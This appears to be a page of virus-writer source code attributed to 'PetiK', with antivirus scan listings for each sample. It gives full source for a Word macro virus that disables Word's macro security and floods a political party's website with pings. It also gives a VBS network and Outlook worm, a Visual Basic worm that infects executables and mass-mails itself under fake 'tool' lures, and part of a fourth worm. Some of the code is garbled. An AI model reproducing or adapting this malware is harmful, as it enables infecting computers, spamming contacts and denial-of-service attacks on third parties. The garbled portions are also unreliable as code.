8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.15 Additional information File size: 1571 bytes MD5...: b358dde6d08d84cf4571df91509df185 SHA1..: bdec927521e2209aee0783b72b970b2211fb2d51

Result VBS/Navigator.2 VBS/Navigator.A VBS:Malware-gen VBS/Bother VBS.Navigator.A VBS.Generic.83 VBS/Rophage.B VBS/Navigator.A Virus.VBS.Navigator HTML/Vierka.A VBS.Navigator.A Virus.VBS.Navigator W32/PetTick W32/PetTick Script.Navigator.2 Virus:VBS/Navigator.gen VBS/Petik VBS/Navigator.F VBS.Haram.A@mm W32/Petik.U.worm VBS.Ngator.A W32/Petik-Y VBS.Pet_Tick.gen VBS_PETTICK.Y VBS.Ngator.A

File Haram.vbs received on 05.16.2009 11:58:35 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.15 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.15 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.15 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.15 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.735 2009.05.14 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.16 PCTools 4.4.2.0 2009.05.15 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.15 Additional information File size: 721 bytes MD5...: 0316dbe5df244e6a4fc18ce96e7b3907 SHA1..: 1fea896705358384a6889d1a223f1416b2880902

Result VBS.Lee.Based!IK VBS/Petik VBS/Navigator.1 Heuristic-31 VBS:Malware-gen VBS/Randa Generic.ScriptWorm.D5290353 VBS.Generic.84 VBS/Mailworm1 Heuristic-31 Email-Worm.Win32.Petik VBS/Pica.X@mm Generic.ScriptWorm.D5290353 VBS.Lee.Based VBS.Generic.MassMailer Email-Worm.Win32.Petik W32/PetTick.vbs W32/PetTick.vbs Script.Navigator.1 Virus:VBS/Petik.Y probably unknown SCRIPT VBS.Haram.A@mm VBS.Pethar.A VBS.I-Worm.Lee-Based W32/Petik-Y VBS.Pet_Tick.gen VBS_GENERIC.009 Email-Worm.Win32.Petik VBS.Worm-Family VBS.Pethar.A

' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '

Name : W97M.Blood Author : PetiK Language : VBA Word Date : June 18th 2001 Size : 2701 byte

Macro AutoOpen : Disabled all protection against virus. Create \WINDOWS\blood.sys and put the macro code. If not exist the Blood key in the Windows key of regedit, W97M.Blood infects “NORMAL.DOT”. If the current day is the 15th it alters the name of the owner and the organization by “BloodMan” and “PetiK Corporation”. Macro HelpAbout : It displayas a balloon message. Macro ViewVBCode : Adds value in the run key to disabled the mouse and displays a message box. Macro AutoClose : It shoes a message box. After it calls two others macro. Macro PetiK : Create folder \WINDOWS\Blood and put the file TitleBlood.txt. Macro Attak : It pings the fucking web site of “Front National”. It’s a DoS attack.

Attribute VB_Name = "Blood" Sub AutoOpen() On Error Resume Next With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& WordBasic.DisableAutoMacros 0 Set Nor = NormalTemplate.VBProject.VBComponents Set Doc = ActiveDocument.VBProject.VBComponents win = Environ("windir") DropFile = win & "\blood.sys" If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") <> "OK" Then Doc("Blood").Export DropFile Nor.Import DropFile System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") = "OK" End If If Doc.Item("Blood").Name <> "Blood" Then Nor("Blood").Export DropFile Doc.Import DropFile ActiveDocument.Save End If If Day(Now) = 15 Then System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "BloodMan" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "PetiK Corporation" End If End Sub Sub HelpAbout() With Application.Assistant .Visible = True End With With Assistant.NewBalloon

.Text = "W97M.Blood.A coded by PetiK (c)2001" .Heading = "W97M.Blood" .Animation = msoAnimationGetAttentionMajor .Button = msoButtonSetOK .Show End With End Sub Sub ViewVBCode() System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "Blood1") = "rundll32 mouse,disable" MsgBox "Your computer is dead." + vbCr + "Don't stop your machine", vbCritical, "W97M.Blood" ShowVisualBasicEditor = True End Sub Sub AutoClose() MsgBox "PetiK vous souhaite une très bonne journée", vbExclamation, "W97M.Blood" Call PetiK Call Attak End Sub Sub PetiK() On Error Resume Next win = Environ("windir") FileSystem.MkDir win & "\Blood" Open win & "\Blood\TitleBlood.txt" For Output As #1 Print #1, "For the new Macro Virus W97M.Blood by PetiK" Print #1, "" Print #1, "Hi " & Application.UserName & "," Print #1, "How do you do ?" Print #1, "Your computer is infected by Blood" Print #1, "It's not a dangerous macro." Print #1, " Bye. PetiK" Close #1 FileSystem.SetAttr win & "\Blood\TitleBlood.txt", vbReadOnly End Sub Sub Attak() Shell "ping -l 5000 -t www.front-national.fr", vbHide Shell "ping -l 5000 -t front-national.fr", vbHide End Sub

File Blood.doc received on 05.16.2009 10:45:39 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.15 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.15 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.15 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.15 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.735 2009.05.14 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.15 PCTools 4.4.2.0 2009.05.15 Prevx 3.0 2009.05.16 Rising 21.29.51.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.15 Additional information File size: 36864 bytes MD5...: 8cd23603a72f1dcbdf22e03d49c17f83 SHA1..: f970fea6b876ba8d133900ceb55a14bf0c307335

Result Virus.MSWord.Petman.A!IK W2000M/Petman.A Virus/MSWord.MSWord W97M/Petman.A MW97:Petman-A W97M/Petman W97M.Petman.A WM.Pivis Virus.MSWord.Petik W97M.Petik O97M.GNtp W97M/Petman.A W97M/Petman.A Virus.MSWord.Petik W97M/Petman.A W97M.Petman.A Virus.MSWord.Petman.A Macro.Petik Virus.MSWord.Petik W97M/Generic W97M/Generic Macro.Petman.A Virus:W97M/Petman.A W97M/Petman.A W97M/Petman.A W97M.Petman.A W97M/Kodak.worm WORD.97.Petik.M Macro.Word97.Petik WM97/Dool-A Virus.MSWord.Petik (v) W97M.Pet_Tick.Intd W2KM/Generico W97M_PETMAN.A Virus.W97M.Blood W97M.Petman.A WORD.97.Petik.M

' ' ' '

Name : VBS.Cachemire Author : PetiK Language : VBS Date : 19/06/2002

On error resume next fs="FileSystemObject" sc="Scripting" wsc="WScript" sh="Shell" nt="Network" crlf=Chr(13)&Chr(10) Set fso=CreateObject(sc & "." & fs) Set ws=CreateObject(wsc & "." & sh) Set ntw=CreateObject(wsc & "." & nt) Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set tmp=fso.GetSpecialFolder(2) desk=ws.SpecialFolders("Desktop") strp=ws.SpecialFolders("StartUp") Set fl=fso.OpenTextFile(WScript.ScriptFullName,1) wrm=fl.ReadAll fl.Close If WScript.ScriptFullName <> sys&"\MsBackup.vbs" Then MsgBox "Sorry but the file """ & WScript.ScriptName & """ is not a valid VBS file",vbcritical,"ALERT" fso.GetFile(WScript.ScriptFullName).Copy(sys&"\MsBackup.vbs") 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MsBackup",sys&"\MsBackup.vbs" netn="" For cnt = 1 To 8 netn=netn & Chr(Int(Rnd(1) * 26) + 97) Next netn = netn & ".vbs" msgbox netn Loop spreadnetwrk(netn) set lnk = ws.CreateShortcut(desk & "\Surprise.lnk") lnk.TargetPath = sys&"\MsBackup.vbs" lnk.WindowStyle = 1 lnk.Hotkey = "CTRL+SHIFT+F" lnk.IconLocation = "wscript.exe, 0" lnk.Description = "Surprise" lnk.WorkingDirectory = sys lnk.Save Else y=0 Do Until y=Day(Now) Sub spreadout() y=y+1 Loop If Day(Now) = Int((31 * Rnd) + 1) Then ws.Run "notepad.exe" wscript.Sleep 200 ws.SendKeys "Date : " & date & vbLf ws.SendKeys "Time : " & time & crlf x = 0 Do Until x=6 num = Int((6 * Rnd) + 1) If num = 1 Then mess = "You're infected by my new VBS virus. " & VbLf & "Don't panic, it's not Dangerous" & vbCrlf ElseIf num = 2 Then mess = "Why do you click unknown file ??" & crlf ElseIf num = 3 Then mess = "A new creation coded by PetiK/[b8]" & crlf ElseIf num = 4 Then mess = "Contact an AV support to disinfect your system" & crlf

ElseIf num = 5 Then mess = "Be careful next time" & crlf ElseIf num = 6 Then mess = "Curiosity is bad" & crlf End If For i = 1 to Len(mess) ws.SendKeys Mid(mess,i,1) wscript.Sleep 50 Next x=x+1 Loop End If End If Sub spreadnetwrk(nname) Set drve = ntw.EnumNetworkDrives If drve.Count > 0 Then For j = 0 To drve.Count -1 If drve.Item(j) <> "" Then fso.GetFile(WScript.ScriptFullName).Copy(drve.Item(j) & "\" & nname) End If Next End If End Sub Sub spreadout() Set A=CreateObject("Outlook.Application") Set B=A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.count Set E=C.AddressEntries(D) Set F=A.CreateItem(0) F.To=E.Address F.Subject="Backup your system..." F.Body="Use this tool to create a backup of your system..." Set G=CreateObject("Scripting.FileSystemObject") F.Attachments.Add(sys&"\MsBackup.vbs") F.DeleteAfterSubmit=True If F.To <> "" Then F.Send End If Next End If Next End Sub

File Cachemire.vbs received on 05.16.2009 11:21:06 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 Result Email-Worm.Win32.Petik!IK VBS/Petik.C Worm/Petik.L Worm/Win32.Petik VBS/Petik.I@mm VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.91D6A07B Worm.Petik.l Worm.Win32.Petik.l VBS.Generic.43 VBS.MailSender. VBS/SSIWG2 VBS/Petik.I@mm Email-Worm.Win32.Petik.l VBS/Petik.L@mm Generic.ScriptWorm.91D6A07B Email-Worm.Win32.Petik Email-Worm.Win32.Petik.l VBS/Pica.worm.gen VBS/Pica.worm.gen Worm.Petik.L Virus:VBS/Emire probably unknown SCRIPT VBS/GenMail.D VBS.Petchem.A Worm Generic VBS.Petchem.A Worm.Hopalong VBS/Pica-G VBS.Camire.Int VBS/Mass.worm.gen VBS_PICA.GEN Email-Worm.Win32.Petik.l VBS.Worm-Family

Additional information File size: 2832 bytes MD5...: 175dbf33282ed471b62d616be435a03f SHA1..: 8d0a9298ab3af4827f47a90e3fbbe7073e5a9376

' Name : W32.HLLW.Mars ' Author : PetiK ' Language : Visual Basic ' Date : 20/06/2002 ' ' ' ' Attribute VB_Name = "Module1" Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long Private Declare Function InternetCloseHandle Lib "wininet" (ByVal hInet As Long) As Integer Private Declare Function InternetReadFile Lib "wininet" (ByVal hFile As Long, ByVal sBuffer As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long Private Declare Function SetCurrentDirectory Lib "kernel32" Alias "SetCurrentDirectoryA" (ByVal lpPathName As String) As Long Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long Public sysDir As String Public winDir As String Public orig As String Public cop As String Const CSIDL_STARTUP = &H7 Private Type SHITEMID cb As Long abID As Byte End Type Private Type ITEMIDLIST mkid As SHITEMID End Type Sub Main() On Error Resume Next Dim sp, ext(1 To 9) As String, exts ext(1) = "index.htm" ext(2) = "index.html" ext(3) = "index.asp" ext(4) = "default.htm" ext(5) = "default.html" ext(6) = "default.asp" ext(7) = "main.htm" ext(8) = "main.html" ext(9) = "main.asp" Set ws = CreateObject("WScript.Shell") sysDir sysDir winDir winDir orig = Call Call Call Call = Space(500) = Left(sysDir, GetSystemDirectory(sysDir, Len(sysDir))) = Space(500) = Left(sysDir, GetWindowsDirectory(winDir, Len(winDir))) App.Path & "\" & App.EXEName & ".exe"

Install VbsDrop InfectExe(sysDir) InfectExe(winDir)

checkconnect: If InternetGetConnectedState(0&, 0&) = 0 Then GoTo checkconnect sp = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") If Len(sp) <> 0 Then If Right(sp, 1) = "/" Then

For i = 1 To 9 Call srchmail(sp & ext(i)) Next i ElseIf Right(sp, 4) <> ".htm" And Right(sp, 5) <> ".html" Then For i = 1 To 9 Call srchmail(sp & "/" & ext(i)) Next i Else End If End If End Sub Sub Install() On Error Resume Next Set ws = CreateObject("WScript.Shell") FileCopy orig, sysDir & "\DebugW32.exe" ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug", sysDir & "\DebugW32.exe" End Sub Private Function GetSpecialfolder(CSIDL As Long) As String Dim r As Long Dim IDL As ITEMIDLIST r = SHGetSpecialFolderLocation(100, CSIDL, IDL) If r = NOERROR Then Path$ = Space$(512) r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$) GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1) Exit Function End If GetSpecialfolder = "" End Function Sub VbsDrop() On Error Resume Next Dim lngbufferlen Dim bbyte As Byte Dim pefile As String orig = App.Path & "\" & App.EXEName & ".exe" vbfle = GetSpecialfolder(CSIDL_STARTUP) & "\start.vbs" Open orig For Binary As #1 DoEvents Do While Not EOF(1) DoEvents Get #1, , bbyte e = Hex(bbyte) If Len(e) = 1 Then e = "0" & Hex(bbyte) pefile = pefile & e Loop Close #1 vbsf = "'Mars" & vbCrLf & _ "On Error Resume Next" & vbCrLf & _ "Set fso=CreateObject(""Scripting.FilesystemObject"")" & vbCrLf & _ "Set ws=CreateObject(""WScript.Shell"")" & vbCrLf & vbCrLf & _ "pevb=""" & pefile & """" & vbCrLf & _ "read = dec(pevb)" & vbCrLf & _ "Set r = fso.CreateTextFile(fso.GetSpecialFolder(1) & ""\DebugW32.exe"", 2)" & vbCrLf & _ "r.Write read" & vbCrLf & _ "r.Close" & vbCrLf & _ "ws.RegWrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug"", fso.GetSpecialFolder(1) & ""\DebugW32.exe""" & vbCrLf vbsf2 = "For each fil in fso.GetFolder(ws.SpecialFolders(""MyDocuments"")).Files" & vbCrLf & _ "ext = LCase(fso.GetExtensionName(fil.Path))" & vbCrLf & _ "If ext <> ""vbs"" Then" & vbCrLf & _ "fso.GetFile(WScript.ScriptFullName).Copy(fil.Path & "".vbs"")" & vbCrLf & _ "End If" & vbCrLf & _ "For Each sf In fso.GetFolder(ws.SpecialFolders(""MyDocuments"")).SubFolders" & vbCrLf & _ "sprd(sf.Path)" & vbCrLf & _ "Next" & vbCrLf & _ "Next" & vbCrLf vbsf3 = "Sub sprd(dir)" & vbCrLf & _ "On Error Resume Next" & vbCrLf & _

"For Each fil In fso.GetFolder(dir).Files" & vbCrLf & _ "ext = LCase(fso.GetExtensionName(fil.Path))" & vbCrLf & _ "If ext <> ""vbs"" Then" & vbCrLf & _ "fso.GetFile(WScript.ScriptFullName).Copy(fil.Path & "".vbs"")" & vbCrLf & _ "End If" & vbCrLf & _ "Next" & vbCrLf & _ "For Each sf In fso.GetFolder(dir).SubFolders" & vbCrLf & _ "sprd(sf.Path)" & vbCrLf & _ "Next" & vbCrLf & _ "End Sub" & vbCrLf & vbCrLf & _ "Function dec(octe)" & vbCrLf & _ "For hexad = 1 To Len(octe) Step 2" & vbCrLf & _ "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" & vbCrLf & _ "Next" & vbCrLf & _ "End Function" & vbCrLf vbsf4 = "Sub SprdOut()" & vbCrLf & _ "Set outl=CreateObject(""Outlook.Application"")" & vbCrLf & _ "For Each C In outl.GetNameSpace(""MAPI"").AddressLists" & vbCrLf & _ "If C.AddressEntries.Count <> 0 Then" & vbCrLf & _ "For dcnt=1 To C.AddressEntries.Count" & vbCrLf & _ "Set courrier=outl.CreateItem(0)" & vbCrLf & _ "courrier.To=C.AddressEntries(dcnt).Address" & vbCrLf & _ "courrier.Subject=""Important EMail for "" & C.AddressEntries(dcnt).Name" & vbCrLf & _ "courrier.Body=""Look at this attached file, it may be important.""" & vbCrLf & _ "courrier.Attachments.Add(wScript.ScriptFullName)" & vbCrLf & _ "courrier.DeleteafterSubmit=True" & vbCrLf & _ "If courrier.To <> """" Then" & vbCrLf & _ "courrier.Send" & vbCrLf & _ "End If" & vbCrLf & _ "Next" & vbCrLf & _ "End If" & vbCrLf & _ "Next" & vbCrLf Open vbfle For Output As #1 Print #1, vbsf Print #1, vbsf2 Print #1, vbsf3 Print #1, vbsf4 Close #1 End Sub Sub InfectExe(dir As String) On Error Resume Next orig = App.Path & "\" & App.EXEName & ".exe" Set fso = CreateObject("Scripting.FileSystemObject") If fso.FolderExists(dir) Then x = 0 For Each P In fso.GetFolder(dir).Files ext = LCase(fso.GetExtensionName(P.Name)) nam = LCase(P.Name) If ext = "exe" Then If LCase(P.Name) <> "debugw32.exe" And (Right(LCase(P.Name), 9) <> "_vbpe.exe") Then If Not fso.FileExists(P.Name & "_vbpe.exe") Then FileCopy orig, dir & "\" & P.Name & "_vbpe.exe" x = x + 1 End If End If End If If x = 5 Then Exit For Next End If End Sub Sub srchmail(site As String) On Error Resume Next Set fso = CreateObject("Scripting.FilesystemObject") Const INTERNET_OPEN_TYPE_DIRECT = 1 Const INTERNET_OPEN_TYPE_PROXY = 3 Const INTERNET_FLAG_RELOAD = &H80000000 Dim hOpen As Long, hFile As Long, sBuffer As String, Ret As Long Dim mlto As String sBuffer = Space(25000) hOpen = InternetOpen(scUserAgent, INTERNET_OPEN_TYPE_DIRECT, vbNullString, vbNullString, 0) hFile = InternetOpenUrl(hOpen, site, vbNullString, ByVal 0&, INTERNET_FLAG_RELOAD, ByVal 0&)

InternetReadFile hFile, sBuffer, 25000, Ret InternetCloseHandle hFile InternetCloseHandle hOpen For j = 1 To Len(sbufr) If Mid(sBuffer, j, 7) = "mailto:" Then mlto = "" cnt = 0 Do While Mid(sBuffer, j + 7 + cnt, 1) <> """" mlto = mlto + Mid(sBuffer, j + 7 + cnt, 1) cnt = cnt + 1 Loop Call SendMail(mlto) End If Next End Sub Sub SendMail(email As String) Dim out orig = App.Path & "\" & App.EXEName & ".exe" Set out = CreateObject("Outlook.Application") Set map = out.GetNameSpace("MAPI") map.Logon "profile", "password" Set mel = out.CreateItem(0) mel.To = email mel.Subject = "Congratulations for your site" mel.Body = "Congratulations for your site" & vbCrLf & _ "This is a good tool to improve it." & vbCrLf & vbCrLf & _ "Best Regards." mel.Attachments.Add orig, 1, 1, "WebMakeFullInstall.exe" mel.Send map.Logoff Set out = Nothing End Sub

File WormMars.exe received on 05.16.2009 19:58:38 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Mars!IK Win32/Mars.worm.12800 Worm/Mars.3 Worm/Win32.Win32 W32/Gubed.A@mm Win32:Gubed I-Worm/Mars Win32.Mars.B@mm I-Worm.Mars Worm.Mars Worm.Win32.Mars.A Win32.HLLM.Generic.61 Win32.Mars Win32/Gubed W32/Gubed.A@mm Email-Worm.Win32.Mars W32/Gubed.A@mm Win32.Mars.B@mm Email-Worm.Win32.Mars Email-Worm.Win32.Mars Email-Worm.Win32.Mars W32/Gubed@MM W32/Gubed@MM Worm.Mars.3 Worm:Win32/Gubed.A@mm Win32/Mars.A Gubed.A@mm Worm Generic Email-Worm.Mars!sd5 High Risk Worm Worm.Mail.Mars.a W32/Mars-A Email-Worm.Win32.Magistr.a.poly W32.Gubed.int Trojan/Hami WORM_GUBED.A Email-Worm.Win32.Mars I-Worm.Win32.Mars.12800 I-Worm.Petgub.A

Additional information File size: 12800 bytes MD5...: 1b81a0863eafb1a4b260df5c7c1d8621 SHA1..: 7c218fa9d30d54966f472e6703123d13e38152f1 PEiD..: Crypto-Lock v2.02 (Eng) -&gt; Ryan Thian

' ' ' '

Name : W32.HLLW.DocTor Author : PetiK Language : Visual Basic Date : 22/06/2002

Attribute VB_Name = "Module1" Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) Private Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) Const CSIDL_STARTUP = &H7 Private Type SHITEMID cb As Long abID As Byte End Type Private Type ITEMIDLIST mkid As SHITEMID End Type Public docv As String Sub Main() On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") org = App.Path & "\" & App.EXEName & ".exe" If InStr(1, GetCommLine, "/newrun") = 0 Then docv = "C:\" Randomize (Timer) For i = 1 To 8 docv = docv & Chr(Int(Rnd(1) * 26) + 97) Next i docv = docv & ".txt" Call Install Call DocVir Call VbsDrop Else Sleep 20000 DeleteFile GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs" chkinet: If InternetGetConnectedState(0&, 0&) = 0 Then GoTo chkinet Set out = CreateObject("Outlook.Application") Set map = out.GetNameSpace("MAPI") If out = "Outlook" Then map.Logon "profile", "password" For y = 1 To map.AddressLists.Count Set z = map.AddressLists(y) x = 1 Set mel = out.CreateItem(0) For oo = 1 To z.AddressEntries.Count e = z.AddressEntries(x) ml.Recipients.Add e x = x + 1 If x < 500 Then oo = z.AddressEntries.Count Next oo mel.Subject = "NewTool for Word Macro Virus" mel.Body = "This tool allows you to protect you against unknown macro virus." & vbCrLf & _ "Click on the attached file to run this freeware." & vbCrLf & vbCrLf & _ "Best Regards. Have a nice day" mel.Attachments.Add orig, 1, 1, "DocTor.exe"

